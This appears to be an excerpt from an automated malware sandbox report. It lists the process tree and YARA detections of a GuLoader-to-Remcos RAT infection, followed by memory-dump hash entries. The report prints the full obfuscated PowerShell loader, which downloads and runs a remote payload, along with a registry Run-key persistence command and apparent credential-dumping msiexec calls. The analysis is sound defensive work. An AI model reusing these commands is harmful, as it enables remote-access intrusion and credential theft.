                                                                  Commandline:powershell.exe -windowstyle hidden " <#Sweetshop Forprogrammere Bevidstlse #>;$Billetkontoret='hovedngles';<#hygroscopically Borgerliggr Torpets Unclassified Blokvognens #>;$Psykes=$sulfate+$host.UI;function Boendes($Motorisere){If ($Psykes) {$Unpictorialised++;}$Aarskiftet=$genindkaldte+$Motorisere.'Length'-$Unpictorialised; for( $Herregaardene131=4;$Herregaardene131 -lt $Aarskiftet;$Herregaardene131+=5){$Pyramidia++;$Foredevote+=$Motorisere[$Herregaardene131];$Riskfulness='Oprejses';}$Foredevote;}function Aromastofs($Oversigtsbilleders173){ & ($Fandangoer) ($Oversigtsbilleders173);}$Kolonialvares=Boendes 'LaggMHjelo D lz dreiUnsilMat lTa fa F e/Forb ';$Kolonialvares+=Boendes 'S ks5Bran. Pr 0Bede Topi(Fl bWK.ldiMadenbeard,uako TomwMarrsVis JerkN UdaT kov oss1Agra0T nn.besk0bio ;Feri .aphWNobbiRumln Feu6Pick4Ansv;Nord Hen xBirk6 Afs4sk d;,oss OffrKrydvDomm:Spr 1Sm g3Uud,1A ti. lmu0Calo) Si Man G askeHjercde.ak ssioUdsm/ Rot2Depo0Verb1Erot0Elec0Spar1,iks0 Kun1Jord PreFYeariRe orShreeS orfOct,oFarax Ri /Supe1Mail3Lap 1Pyxi.Sawn0Tyre ';$Sparebsserne=Boendes ' CoeuR mmSMatlE Br rVo,d-U,faaKon.gBrn.EForsnDolkt kva ';$Cafuso=Boendes 'Cho,hPytot,uttt A dp V,tsSmle:mode/ C,u/St ecLamiaSc irfraneSesue yhrGodsfHjemi KunnDecrdlivre OutrSnek. 
IderOrbio .av/Mngdv pndn Ko,/Juk T Pr rT,keaW,stuNsker,ackiRes.gDis hSpaaeBem.d PoleCalfr Bas.ProcsHeineTranaAmin ';$Luncher=Boendes 'R ck>Vi,t ';$Fandangoer=Boendes 'HanhIunrueBoniXTemp ';$Ensnarement='Unlabialise167';$Totalisatorers='\Knighting.Pro';Aromastofs (Boendes ' Alg$E phgTinkLBadkOBrugBLayoaIndblBrne:Pr dT BatRBa keIspim N,nmSkumePrigspseutUd ao udfL,rouECu tnpas,ehals=Pala$Decie BebnLaarVCart:Rou,aChilp ampDri.DSikkaF.intAdm.AAn.i+Scud$,atat,wkwoRekttGaleAHardLBasiI Li S .tyAEquiTStosO.chorafstEVoveRSlidSOver ');Aromastofs (Boendes 'Venc$ XylgSlicLCo doVietb Pr.ADe sLPrst:UndepLordo Mi tJordASke sDynasVak.iElemFSheeEBrutRTr noSkitUAlcaS Kon=Folk$ entcTrapaSammfDy eUGuatsRovso ksp.Hu vsInseP ImplCollIRacetJ,ds(Dsl,$ Ug.l Z ru.ypeNFortc RgthN veESbeoRMed ) Soc ');Aromastofs (Boendes ' For[EmbenIsbjEtr ntrun .G nesFredEKaffRFir VLilliWaffc uefEHl np Lono l einasiNNonptKeycmExteA ByonFedeAMi rg ReiESu erkamp]Dis :Infe: ForsTrykEE,orCUnimu S irNontIKluntAtr yFejlpForor FroOAktutplotOH veC ilkOLoupLNonc Svk=Acep Lae[SturNDrage Va TT.le. Sk SMu feSlvecShr uSeleR bevI DdktTriryInwep TchrOverO ooptAizoo usCTargO,ettLLiteTNonpYArbepTyvee O,e]Tros:Tank:.enetKneblsomeS rti1dict2Well ');$Cafuso=$Potassiferous[0];$Kvatorialguineaner=(Boendes 'st.k$Vin GVrngl.toloMo,ebOv yA VoyLCoun:HestU.altn MaiE Ru vPi ta TouNBroke ouis u.gCYanaEStr,NAquaTRedrL NotYMel.=konsn ampeN tuwGuls- A.kOCivibAkkrjConfE Pa c U.dTCcdc SnkeSKekcYUrimsBalatAfdaEFlaaM Ach. osn preE Drat Sk .Wardw ExcEGangBAllecCro lfrisIInteeAnmen UndTmaan ');Aromastofs ($Kvatorialguineaner);Aromastofs (Boendes 'Fors$ RebU SpanAcineamfev MinaTeernRegieJulos onecpheneDecln ButtoverlTilsyUnh.. dskHLegieVoldaSpild iljeBetwrU absPlod[ ata$KlisSPaatpPrevaFr dr nvieHeteb aassIntesMulieI terSpinnVejeeTemp]Tord= Nit$UdviKOm aoBak lSk noHys.nSpiniBactaJehul UnpvPersaPater.chwerealsSoc, ');$Styklistens=Boendes ' ece$ Ou,URetanRenye Dicvme eaTarsn S eedispsGeldcIst eMadanTypet polIgn yLast. 
MasDHelaoSuprw umvnExoclTja o S.na RitdP,ykFHuf iPipelSwaneReg ( Nyf$UndsC ,ftaGodtf yctu .onsBackoCom,,Stri$ OraBHimmiDyregHavrePresm,rlsi ipnTykka Sp l ubl)Nonc ';$Bigeminal=$Tremmestolene;Aromastofs (Boendes 'Fl x$ TragSqualSpruO,sombDi.ea olalVaag: OdyFBlaslIndey HyrGGrsktSli.nsy.tiGlobnForbGItoie ommnDagnETrve= Exs(N ntTRetle asksTa sTSto -Spi,pFrysAI teTDiscHCirr U rk$CantbCho iInteGletveU,ilMKlveI ndNKentaUndeL Sta).ort ');while (!$Flygtningene) {Aromastofs (Boendes 'Tisk$WiwigSur l,ganoUnweb ffaaStaml Fok:SandMcockaQu nl EksiShaic mbai.egaoAb.ouEm rsD gsnNe,seFyris errs,yre1 Cal7Ch.s1 Non=Mach$SiamtE ferUndeu.ande .en ') ;Aromastofs $Styklistens;Aromastofs (Boendes ' UnlSRopeT P laMaryrAfklTRita-GeneSAfislBadeeOrchE merPVefr .eie4Inex ');Aromastofs (Boendes 'Frsk$Ma tgIntelIse,orideBRe mASma l.iau:MetrfProbLTab.YBonigImplTarbeNAftvi nuqnUndogR.une OvenTestEDruk=s.ns(teartMotoe Af SRa bT lac-UnwapErwiA SubT ishBrne Hund$Kl nBa ipIUntuGtideEAf.vM ,elIB.mbNRetrAbabyLGear)inso ') ;Aromastofs (Boendes 'Slug$ SjagGrahLDdsfORe.obBe.iAPrefLRdst:V,ntMTri iFlagKivieRVi eoFrikpEngeRSeleOUnfuC SpieForbs ChesKu.loPerfRSu rE EpirPharNQuiteEjec=tusk$P ntGsik.l omio GodbDiaga BralUnr :VesptTr kiPacec irecC,amhPiraEcrafNGalo+lic,+Nonv%Disu$VentpDowlOSyritLixiA tesFe iSBredIrivefBr.beTrolrmgleOGi.tuOpvas Blu.Roe cChemO kn,uBowlNRi sT fly ') ;$Cafuso=$Potassiferous[$Mikroprocessorerne];}$holding=324537;$Sevrdigheders=29555;Aromastofs (Boendes ' S y$ InsGrab lMegao web Na,aOuttlFort:KonsOZoopVKilueAlber ThigKnivUVi gnHe p Reva=St,k rregDo.nEHegntPlan-Pra,cLoddononsNBedetEftee RannDip,T For Kloa$ RugbUro iEgneGI,dreordem BesiFi,dnSuppaUns l ucr ');Aromastofs (Boendes 'Sick$,rndgDunklMah o SurbStrmaGattl ske:OrthBPrydaNor,kFi.at m ceMikrrMaltiEve,eUrtikHet,u Vaml OvetSensuEv lr VicsUrli Milj=Coun Disk[ArabSCoacy QuisShogta ine H,vmStri.Po.tCfordo ossnSpo vIc sety.irApokt ine] oi: avo:.sehFSprorVirkoPud mDup,BSeksaDians A oeBefa6P od4RecoSHe,etVi.irU dei B 
pnBihegUnsa(Ting$BoroOSki,v Ar.eLongrV ctgPe.ruRektn Vik).nse ');Aromastofs (Boendes 'Form$Sa ag,tomLDrifo SatBArgua aniL ost: ladtacloRPol.aTavsNL pps FoleC.taN Apon aboa eug Unse=Skat U dl[KaffsLumiYFjorsp.ast,olmeuplim ns.PtomtDet EJes X B.kTBill.OmarEObsenNodoC oruoMa kDSelvI SkrNP.osgFrot]Vejk: Min:St.fAGemmsFordCNeglIDopiiKr.e.Bar gcomie ljlTKo mSTermtCoxrRMagyIEnc nAnsog Emp(Skat$tronbOpbyA HonkrebntMaaleSelvRbevaIVierE ubkCh.nuT gelSepeTP.rtuUdmerGemeskolo) Sik ');Aromastofs (Boendes ' D m$ByggGSeculTranO tanBLrreAS.orL Sca:LagenOverOHkliN voGS ara FiglpaedaPrelCDevet hai olicClos=Mais$stroT Ek R AthA Snon ProSDecoeDelinTenoNNgs aScab.Rapas ildUTh ubDrifsSireTServr jtsis btNBillGbeky(Anbe$ RephskabO VanLDekoD R pi T kn M lG,ebr,Brmm$Sto sGloreAfbivakt R AutdScuti,quiGVoldhS preEsprdPateePneurSkibsShin)Vaab ');Aromastofs $Nongalactic;"
                                                                  Imagebase:0x7ff7be880000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2175598804.0000024110071000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:3
                                                                  Start time:07:07:22
                                                                  Start date:16/10/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:5
                                                                  Start time:07:07:31
                                                                  Start date:16/10/2024
                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Sweetshop Forprogrammere Bevidstlse #>;$Billetkontoret='hovedngles';<#hygroscopically Borgerliggr Torpets Unclassified Blokvognens #>;$Psykes=$sulfate+$host.UI;function Boendes($Motorisere){If ($Psykes) {$Unpictorialised++;}$Aarskiftet=$genindkaldte+$Motorisere.'Length'-$Unpictorialised; for( $Herregaardene131=4;$Herregaardene131 -lt $Aarskiftet;$Herregaardene131+=5){$Pyramidia++;$Foredevote+=$Motorisere[$Herregaardene131];$Riskfulness='Oprejses';}$Foredevote;}function Aromastofs($Oversigtsbilleders173){ & ($Fandangoer) ($Oversigtsbilleders173);}$Kolonialvares=Boendes 'LaggMHjelo D lz dreiUnsilMat lTa fa F e/Forb ';$Kolonialvares+=Boendes 'S ks5Bran. Pr 0Bede Topi(Fl bWK.ldiMadenbeard,uako TomwMarrsVis JerkN UdaT kov oss1Agra0T nn.besk0bio ;Feri .aphWNobbiRumln Feu6Pick4Ansv;Nord Hen xBirk6 Afs4sk d;,oss OffrKrydvDomm:Spr 1Sm g3Uud,1A ti. lmu0Calo) Si Man G askeHjercde.ak ssioUdsm/ Rot2Depo0Verb1Erot0Elec0Spar1,iks0 Kun1Jord PreFYeariRe orShreeS orfOct,oFarax Ri /Supe1Mail3Lap 1Pyxi.Sawn0Tyre ';$Sparebsserne=Boendes ' CoeuR mmSMatlE Br rVo,d-U,faaKon.gBrn.EForsnDolkt kva ';$Cafuso=Boendes 'Cho,hPytot,uttt A dp V,tsSmle:mode/ C,u/St ecLamiaSc irfraneSesue yhrGodsfHjemi KunnDecrdlivre OutrSnek. 
IderOrbio .av/Mngdv pndn Ko,/Juk T Pr rT,keaW,stuNsker,ackiRes.gDis hSpaaeBem.d PoleCalfr Bas.ProcsHeineTranaAmin ';$Luncher=Boendes 'R ck>Vi,t ';$Fandangoer=Boendes 'HanhIunrueBoniXTemp ';$Ensnarement='Unlabialise167';$Totalisatorers='\Knighting.Pro';Aromastofs (Boendes ' Alg$E phgTinkLBadkOBrugBLayoaIndblBrne:Pr dT BatRBa keIspim N,nmSkumePrigspseutUd ao udfL,rouECu tnpas,ehals=Pala$Decie BebnLaarVCart:Rou,aChilp ampDri.DSikkaF.intAdm.AAn.i+Scud$,atat,wkwoRekttGaleAHardLBasiI Li S .tyAEquiTStosO.chorafstEVoveRSlidSOver ');Aromastofs (Boendes 'Venc$ XylgSlicLCo doVietb Pr.ADe sLPrst:UndepLordo Mi tJordASke sDynasVak.iElemFSheeEBrutRTr noSkitUAlcaS Kon=Folk$ entcTrapaSammfDy eUGuatsRovso ksp.Hu vsInseP ImplCollIRacetJ,ds(Dsl,$ Ug.l Z ru.ypeNFortc RgthN veESbeoRMed ) Soc ');Aromastofs (Boendes ' For[EmbenIsbjEtr ntrun .G nesFredEKaffRFir VLilliWaffc uefEHl np Lono l einasiNNonptKeycmExteA ByonFedeAMi rg ReiESu erkamp]Dis :Infe: ForsTrykEE,orCUnimu S irNontIKluntAtr yFejlpForor FroOAktutplotOH veC ilkOLoupLNonc Svk=Acep Lae[SturNDrage Va TT.le. Sk SMu feSlvecShr uSeleR bevI DdktTriryInwep TchrOverO ooptAizoo usCTargO,ettLLiteTNonpYArbepTyvee O,e]Tros:Tank:.enetKneblsomeS rti1dict2Well ');$Cafuso=$Potassiferous[0];$Kvatorialguineaner=(Boendes 'st.k$Vin GVrngl.toloMo,ebOv yA VoyLCoun:HestU.altn MaiE Ru vPi ta TouNBroke ouis u.gCYanaEStr,NAquaTRedrL NotYMel.=konsn ampeN tuwGuls- A.kOCivibAkkrjConfE Pa c U.dTCcdc SnkeSKekcYUrimsBalatAfdaEFlaaM Ach. osn preE Drat Sk .Wardw ExcEGangBAllecCro lfrisIInteeAnmen UndTmaan ');Aromastofs ($Kvatorialguineaner);Aromastofs (Boendes 'Fors$ RebU SpanAcineamfev MinaTeernRegieJulos onecpheneDecln ButtoverlTilsyUnh.. dskHLegieVoldaSpild iljeBetwrU absPlod[ ata$KlisSPaatpPrevaFr dr nvieHeteb aassIntesMulieI terSpinnVejeeTemp]Tord= Nit$UdviKOm aoBak lSk noHys.nSpiniBactaJehul UnpvPersaPater.chwerealsSoc, ');$Styklistens=Boendes ' ece$ Ou,URetanRenye Dicvme eaTarsn S eedispsGeldcIst eMadanTypet polIgn yLast. 
MasDHelaoSuprw umvnExoclTja o S.na RitdP,ykFHuf iPipelSwaneReg ( Nyf$UndsC ,ftaGodtf yctu .onsBackoCom,,Stri$ OraBHimmiDyregHavrePresm,rlsi ipnTykka Sp l ubl)Nonc ';$Bigeminal=$Tremmestolene;Aromastofs (Boendes 'Fl x$ TragSqualSpruO,sombDi.ea olalVaag: OdyFBlaslIndey HyrGGrsktSli.nsy.tiGlobnForbGItoie ommnDagnETrve= Exs(N ntTRetle asksTa sTSto -Spi,pFrysAI teTDiscHCirr U rk$CantbCho iInteGletveU,ilMKlveI ndNKentaUndeL Sta).ort ');while (!$Flygtningene) {Aromastofs (Boendes 'Tisk$WiwigSur l,ganoUnweb ffaaStaml Fok:SandMcockaQu nl EksiShaic mbai.egaoAb.ouEm rsD gsnNe,seFyris errs,yre1 Cal7Ch.s1 Non=Mach$SiamtE ferUndeu.ande .en ') ;Aromastofs $Styklistens;Aromastofs (Boendes ' UnlSRopeT P laMaryrAfklTRita-GeneSAfislBadeeOrchE merPVefr .eie4Inex ');Aromastofs (Boendes 'Frsk$Ma tgIntelIse,orideBRe mASma l.iau:MetrfProbLTab.YBonigImplTarbeNAftvi nuqnUndogR.une OvenTestEDruk=s.ns(teartMotoe Af SRa bT lac-UnwapErwiA SubT ishBrne Hund$Kl nBa ipIUntuGtideEAf.vM ,elIB.mbNRetrAbabyLGear)inso ') ;Aromastofs (Boendes 'Slug$ SjagGrahLDdsfORe.obBe.iAPrefLRdst:V,ntMTri iFlagKivieRVi eoFrikpEngeRSeleOUnfuC SpieForbs ChesKu.loPerfRSu rE EpirPharNQuiteEjec=tusk$P ntGsik.l omio GodbDiaga BralUnr :VesptTr kiPacec irecC,amhPiraEcrafNGalo+lic,+Nonv%Disu$VentpDowlOSyritLixiA tesFe iSBredIrivefBr.beTrolrmgleOGi.tuOpvas Blu.Roe cChemO kn,uBowlNRi sT fly ') ;$Cafuso=$Potassiferous[$Mikroprocessorerne];}$holding=324537;$Sevrdigheders=29555;Aromastofs (Boendes ' S y$ InsGrab lMegao web Na,aOuttlFort:KonsOZoopVKilueAlber ThigKnivUVi gnHe p Reva=St,k rregDo.nEHegntPlan-Pra,cLoddononsNBedetEftee RannDip,T For Kloa$ RugbUro iEgneGI,dreordem BesiFi,dnSuppaUns l ucr ');Aromastofs (Boendes 'Sick$,rndgDunklMah o SurbStrmaGattl ske:OrthBPrydaNor,kFi.at m ceMikrrMaltiEve,eUrtikHet,u Vaml OvetSensuEv lr VicsUrli Milj=Coun Disk[ArabSCoacy QuisShogta ine H,vmStri.Po.tCfordo ossnSpo vIc sety.irApokt ine] oi: avo:.sehFSprorVirkoPud mDup,BSeksaDians A oeBefa6P od4RecoSHe,etVi.irU dei B 
pnBihegUnsa(Ting$BoroOSki,v Ar.eLongrV ctgPe.ruRektn Vik).nse ');Aromastofs (Boendes 'Form$Sa ag,tomLDrifo SatBArgua aniL ost: ladtacloRPol.aTavsNL pps FoleC.taN Apon aboa eug Unse=Skat U dl[KaffsLumiYFjorsp.ast,olmeuplim ns.PtomtDet EJes X B.kTBill.OmarEObsenNodoC oruoMa kDSelvI SkrNP.osgFrot]Vejk: Min:St.fAGemmsFordCNeglIDopiiKr.e.Bar gcomie ljlTKo mSTermtCoxrRMagyIEnc nAnsog Emp(Skat$tronbOpbyA HonkrebntMaaleSelvRbevaIVierE ubkCh.nuT gelSepeTP.rtuUdmerGemeskolo) Sik ');Aromastofs (Boendes ' D m$ByggGSeculTranO tanBLrreAS.orL Sca:LagenOverOHkliN voGS ara FiglpaedaPrelCDevet hai olicClos=Mais$stroT Ek R AthA Snon ProSDecoeDelinTenoNNgs aScab.Rapas ildUTh ubDrifsSireTServr jtsis btNBillGbeky(Anbe$ RephskabO VanLDekoD R pi T kn M lG,ebr,Brmm$Sto sGloreAfbivakt R AutdScuti,quiGVoldhS preEsprdPateePneurSkibsShin)Vaab ');Aromastofs $Nongalactic;"
                                                                  Imagebase:0xbd0000
                                                                  File size:433'152 bytes
                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2391081799.00000000081E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.2402043771.000000000A47D000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2369581141.0000000005439000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:6
                                                                  Start time:07:07:31
                                                                  Start date:16/10/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:8
                                                                  Start time:07:07:55
                                                                  Start date:16/10/2024
                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                  Imagebase:0x7ff6068e0000
                                                                  File size:59'904 bytes
                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.3285922374.000000000329F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000003.2572731984.0000000007739000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.3293007161.0000000007712000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000003.2628002795.000000000773B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.3293007161.000000000773B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.3293007161.0000000007728000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Target ID:10
                                                                  Start time:07:08:11
                                                                  Start date:16/10/2024
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "humplers" /t REG_EXPAND_SZ /d "%Frenetic% -windowstyle 1 $Overrankness=(gp -Path 'HKCU:\Software\Procentangivelses\').Mannas;%Frenetic% ($Overrankness)"
                                                                  Imagebase:0x7ff632ac0000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:11
                                                                  Start time:07:08:11
                                                                  Start date:16/10/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:12
                                                                  Start time:07:08:11
                                                                  Start date:16/10/2024
                                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "humplers" /t REG_EXPAND_SZ /d "%Frenetic% -windowstyle 1 $Overrankness=(gp -Path 'HKCU:\Software\Procentangivelses\').Mannas;%Frenetic% ($Overrankness)"
                                                                  Imagebase:0x650000
                                                                  File size:59'392 bytes
                                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:13
                                                                  Start time:07:08:19
                                                                  Start date:16/10/2024
                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\gptotbreetfzdjh"
                                                                  Imagebase:0xe40000
                                                                  File size:59'904 bytes
                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:14
                                                                  Start time:07:08:19
                                                                  Start date:16/10/2024
                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qkzzuucgsbxenxwycgm"
                                                                  Imagebase:0xe40000
                                                                  File size:59'904 bytes
                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:15
                                                                  Start time:07:08:19
                                                                  Start date:16/10/2024
                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                  Wow64 process (32bit):false
Commandline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\amesvmmzojprqdsctrgxif"
Imagebase: 0xe40000
File size: 59'904 bytes
MD5 hash: 9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 16
Start time: 07:08:19
Start date: 16/10/2024
Path: C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit): true
Commandline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\amesvmmzojprqdsctrgxif"
Imagebase: 0xe40000
File size: 59'904 bytes
MD5 hash: 9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

                                                                    • Instruction ID: 816e386182213e21a649adc04d80e21244b6540d7fa00bd910163cb71e626923
                                                                    • Opcode Fuzzy Hash: 3840e1adeff5043f299a4f099960a0530d9e9d368dc5e3f474e896570b9d8423
                                                                    • Instruction Fuzzy Hash: 22027D74A002049FDB15CB58C981BAEBBB2EF88704F15C495D905AF3D5CB76ED82CBA1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2378630230.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7100000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$4']q
                                                                    • API String ID: 0-3120983240
                                                                    • Opcode ID: 49be0fbbbf7fae842f382e0a9ec34a4770c61029a77c16e4382d54f5d923f6f4
                                                                    • Instruction ID: c72da8efb7d4cfb760eb52b72c07fef2988a0b66c29686576ce02de70e8446a0
                                                                    • Opcode Fuzzy Hash: 49be0fbbbf7fae842f382e0a9ec34a4770c61029a77c16e4382d54f5d923f6f4
                                                                    • Instruction Fuzzy Hash: 91926BB4B00215DFD724CB58C955B69BBB3EF89314F1080A9D919AB381CBB6ED81CF91
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2378630230.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7100000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$4']q
                                                                    • API String ID: 0-3120983240
                                                                    • Opcode ID: 2e91dff12bb9e03b4dc4886fe558d4e0ed48aad2d0772e5935570b635a998aef
                                                                    • Instruction ID: c047cef7d8dff10f19b27093e7a29f5d4841d46a633c11442cfa129a45b43190
                                                                    • Opcode Fuzzy Hash: 2e91dff12bb9e03b4dc4886fe558d4e0ed48aad2d0772e5935570b635a998aef
                                                                    • Instruction Fuzzy Hash: 57F1B270B002148FDB24DB68CE55BAEBBB7AF88700F108495D509AF3D5CB75AD818BA1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2378630230.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7100000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$4']q
                                                                    • API String ID: 0-3120983240
                                                                    • Opcode ID: 99391c3761b8ce9110b756598216e1cede8833265c477b6ecd324e07bbd3b4bb
                                                                    • Instruction ID: 93821ef1525ea7514dbf0e4c5170aaafdd521c2b680b135cb06f13dc3006c0ec
                                                                    • Opcode Fuzzy Hash: 99391c3761b8ce9110b756598216e1cede8833265c477b6ecd324e07bbd3b4bb
                                                                    • Instruction Fuzzy Hash: FA519CB0708206CFCB2AAF7C845566A7BD2AFC5604B1484A6D541CF2D2DF71D811C7E2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2378630230.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7100000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$4']q
                                                                    • API String ID: 0-3120983240
                                                                    • Opcode ID: 2e143845daafad05e92f41f85368a34972f2ce0b71f018c2b980f4dfb4377416
                                                                    • Instruction ID: 31804d9505f92960b347113df5028e052c4e3c368f085596d1471feb9706d287
                                                                    • Opcode Fuzzy Hash: 2e143845daafad05e92f41f85368a34972f2ce0b71f018c2b980f4dfb4377416
                                                                    • Instruction Fuzzy Hash: DC31BEF17042018FCB19A678957427ABBA6DFC6328B10487ADA02CB3D6DFB1D805C3E1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2378630230.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7100000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q
                                                                    • API String ID: 0-1259897404
                                                                    • Opcode ID: 66a908c82227a8e2c2f7f622d63ada760ecf4436a9374b2f09f7cca4127bb699
